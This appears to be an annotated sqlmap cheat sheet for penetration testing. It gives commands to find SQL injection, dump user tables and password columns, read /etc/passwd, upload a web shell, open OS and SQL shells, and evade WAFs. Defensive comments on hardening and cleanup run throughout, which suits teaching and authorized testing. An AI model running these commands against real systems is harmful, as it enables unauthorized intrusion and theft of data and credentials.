# --- Target and request specification ---
# Test a URL (the GET parameters in the query string are the injection candidates)
sqlmap -u "http://target.com/page.php?id=1"
# Test with POST data (supplying --data makes sqlmap send a POST and test the body parameters)
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
# Test specific parameter (-p restricts testing to "id"; "cat" is sent but not tested)
sqlmap -u "http://target.com/page.php?id=1&cat=2" -p id
# From a saved request file (Burp Suite)
# The file is a raw HTTP request; any cookies or tokens captured in it sit on
# disk in plaintext, so handle it like a credential.
sqlmap -r request.txt
# With cookies
# NOTE: a session cookie, password or bearer token passed as an argument is
# recorded in shell history and visible in the process list, and these examples
# use http://, so it also crosses the network unencrypted. Prefer short-lived
# test credentials and rotate them after the assessment.
sqlmap -u "http://target.com/page.php?id=1" --cookie="session=abc123"
# With HTTP auth (--auth-cred takes "user:password"; same exposure as above)
sqlmap -u "http://target.com/" --auth-type=basic --auth-cred="admin:password"
# With custom headers (-H adds one extra request header per use)
sqlmap -u "http://target.com/" -H "Authorization: Bearer token123"
# X-Forwarded-For is set by the client here. A server that trusts this header
# for IP allow-listing, rate limiting or audit logging can be misled by it; it
# should only be honoured when it comes from the site's own reverse proxy.
sqlmap -u "http://target.com/" -H "X-Forwarded-For: 127.0.0.1"
# --- Enumeration (requires a confirmed injection point) ---
# Get current database (the schema the application's connection is using)
sqlmap -u "http://target.com/?id=1" --current-db
# Get current user
# This is the DBMS account the application connects as. The fewer privileges
# that account holds, the less a single injection exposes, so an unexpectedly
# powerful account here is itself a finding.
sqlmap -u "http://target.com/?id=1" --current-user
# List all databases (only those visible to the application's DBMS account)
sqlmap -u "http://target.com/?id=1" --dbs
# List tables in database (-D selects the database)
sqlmap -u "http://target.com/?id=1" -D dbname --tables
# List the columns of a table (-T selects the table); --columns returns the
# column names and types only, no row data is retrieved.
sqlmap -u "http://target.com/?id=1" -D dbname -T users --columns
# Dump table data
# --dump retrieves every row and stores a copy in sqlmap's local output
# directory. That copy may contain password hashes and personal data; keep it
# encrypted, limit it to what the report needs, and delete it afterwards.
sqlmap -u "http://target.com/?id=1" -D dbname -T users --dump
# Dump specific columns (-C takes a comma-separated list; prefer this over a
# full-table dump when only proof of access is needed)
sqlmap -u "http://target.com/?id=1" -D dbname -T users -C username,password --dump
# --- Injection technique selection ---
# Specify technique (B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline)
# The letters can be combined; BEUST below tests everything except inline
# queries (sqlmap's default is BEUSTQ).
sqlmap -u "http://target.com/?id=1" --technique=BEUST
# Time-based only (blind)
# --time-sec is the number of seconds the DBMS response is delayed (5 is
# sqlmap's default). Results depend on stable latency, and each inferred value
# holds a database connection for that long, so expect slow runs and some load
# on the database.
sqlmap -u "http://target.com/?id=1" --technique=T --time-sec=5
# Union-based only
# NOTE(review): sqlmap documents --union-cols as a range of column counts
# (e.g. 12-16); confirm that a single value such as 3 is accepted by the
# installed version.
sqlmap -u "http://target.com/?id=1" --technique=U --union-cols=3
# --- Request shaping and filter testing ---
# Use random user-agent
# sqlmap's default User-Agent names the tool, so a detection rule keyed only
# on that string stops matching once this switch is used. Detection should rely
# on payload content and request patterns rather than the User-Agent alone.
sqlmap -u "http://target.com/?id=1" --random-agent
# Delay between requests (seconds between consecutive HTTP requests; lowers
# the load on the target and the request rate seen by rate-based alerting)
sqlmap -u "http://target.com/?id=1" --delay=2
# Use a proxy (Burp Suite)
# Routing through a local intercepting proxy keeps a full record of every
# request sent, which is useful as an audit trail for the engagement.
sqlmap -u "http://target.com/?id=1" --proxy=http://127.0.0.1:8080
# Tamper scripts (WAF bypass)
# Tamper scripts rewrite the surface form of a payload (whitespace, letter
# case, operators, encoding) without changing what it does. A signature-based
# WAF is therefore a mitigation layer, not a fix: the durable fix is
# parameterised queries, and filters should normalise input before matching.
sqlmap -u "http://target.com/?id=1" --tamper=space2comment
# Several scripts can be chained as a comma-separated list.
sqlmap -u "http://target.com/?id=1" --tamper=between,randomcase
sqlmap -u "http://target.com/?id=1" --tamper=base64encode
# List tamper scripts (prints the scripts shipped with the installed version)
sqlmap --list-tampers
# --- File system and command access through the DBMS ---
# These options only work when the DBMS account and the database service's OS
# user have been given more than the application needs. Relevant hardening:
# no file privileges for the application account (e.g. MySQL FILE,
# secure_file_priv), a web root the database service user cannot write to,
# and file-integrity monitoring on the web root.
# Read a file (read from the database server's file system, with the
# permissions of the database service user)
sqlmap -u "http://target.com/?id=1" --file-read=/etc/passwd
# Write a file (needs write permission)
# --file-write is the LOCAL file to upload; --file-dest is the absolute path it
# is written to on the database server. The database service user needs write
# permission on the destination. Record every file written to the target so it
# can be removed at the end of the engagement.
sqlmap -u "http://target.com/?id=1" --file-write=/tmp/shell.php --file-dest=/var/www/html/shell.php
# OS shell (if stacked queries + file write)
# Leaves artifacts on the target; sqlmap's --cleanup switch removes the
# sqlmap-specific UDFs and tables it created in the DBMS.
sqlmap -u "http://target.com/?id=1" --os-shell
# SQL shell (interactive prompt that runs SQL statements through the injection
# point, with the privileges of the application's DBMS account)
sqlmap -u "http://target.com/?id=1" --sql-shell
| Flag | Description |
|---|---|
| `--level=5` | Test level (1-5, default 1) |
| `--risk=3` | Risk level (1-3, default 1) |
| `--batch` | Non-interactive, use defaults |
| `--threads=5` | Concurrent threads |
| `--dbms=mysql` | Force specific DBMS |
| `--forms` | Auto-detect and test forms |
| `--crawl=2` | Crawl the site to the given depth |
| `-v 3` | Verbosity level (0-6) |
| `--tor` | Use Tor network |
| `--flush-session` | Clear cached results |